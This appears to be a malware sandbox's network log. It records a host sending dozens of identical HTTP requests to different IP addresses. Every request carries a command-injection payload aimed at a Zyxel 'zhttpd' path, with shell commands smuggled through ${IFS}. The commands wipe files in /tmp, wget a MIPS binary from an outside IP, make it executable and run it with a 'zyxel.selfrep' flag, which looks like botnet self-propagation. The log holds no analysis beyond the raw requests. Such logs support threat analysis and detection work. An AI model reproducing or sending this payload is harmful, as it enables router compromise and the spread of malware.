                                                Jan 28, 2024 10:16:44.101799011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9351192.168.2.233912686.240.189.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101809978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9352192.168.2.2342242146.71.211.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101843119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9353192.168.2.234778039.164.110.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101878881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9354192.168.2.23425462.231.37.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101892948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9355192.168.2.2344554153.151.97.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101912975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9356192.168.2.234792819.175.135.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101929903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9357192.168.2.233384662.229.130.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101973057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9358192.168.2.2349668205.121.53.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101974964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9359192.168.2.234605076.213.29.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.101978064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9360192.168.2.2344550201.83.146.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102005959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9361192.168.2.234426660.19.152.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102049112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9362192.168.2.234482048.8.83.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102076054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9363192.168.2.2334718210.116.117.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102128983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9364192.168.2.2341526218.31.81.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102130890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9365192.168.2.234705053.123.73.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102149010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9366192.168.2.234525083.162.225.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102181911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9367192.168.2.2334814180.101.8.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102226019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9368192.168.2.2344422159.229.182.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102266073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9369192.168.2.236070466.211.158.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102289915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9370192.168.2.2333618109.239.114.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102313995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9371192.168.2.235191018.89.146.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102339983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9372192.168.2.234895477.241.47.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102384090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9373192.168.2.2357764187.26.133.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102404118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9374192.168.2.235748665.117.153.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102433920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9375192.168.2.2360266172.203.45.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102468014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9376192.168.2.234708853.183.58.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102524042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9377192.168.2.2353146173.96.114.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102533102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9378192.168.2.235881864.93.244.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102557898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9379192.168.2.2357310145.55.18.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102583885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9380192.168.2.234937065.129.61.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102612972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9381192.168.2.233611492.123.189.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102617025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9382192.168.2.233736446.80.20.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102637053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9383192.168.2.2340930137.245.30.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102678061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9384192.168.2.2351462145.67.67.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102705956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9385192.168.2.2341226142.71.219.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102720976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9386192.168.2.233443818.14.194.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102755070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9387192.168.2.2340542192.22.182.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102771997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9388192.168.2.2347618161.126.210.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102777958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9389192.168.2.235954638.100.138.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.102802992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9390192.168.2.2351736105.144.219.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105000019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9391192.168.2.2357734219.176.196.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105515957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9392192.168.2.234329831.166.161.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105515957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9393192.168.2.2355890120.175.167.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105542898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9394192.168.2.2357390133.119.233.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105561972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9395192.168.2.2340414139.31.124.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105598927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9396192.168.2.234641290.115.21.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105642080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9397192.168.2.234846037.216.77.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105659962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9398192.168.2.2337394139.226.47.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105683088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9399192.168.2.234435239.77.1.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105691910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9400192.168.2.233314467.14.211.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105739117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9401192.168.2.2356638206.69.113.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105765104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9402192.168.2.2354514124.119.214.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105794907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9403192.168.2.2349536179.80.125.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105812073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9404192.168.2.2352616213.168.4.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105849981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9405192.168.2.2350130109.104.24.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105879068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9406192.168.2.235824866.243.164.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105911970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9407192.168.2.2355136211.225.38.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105937004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9408192.168.2.234431059.247.41.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.105938911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9409192.168.2.2337652171.76.1.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.106009007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9410192.168.2.235472420.85.219.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.106009007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9411192.168.2.2334242165.135.40.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:44.106043100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9412192.168.2.2342928212.77.164.105443
                                                TimestampBytes transferredDirectionData
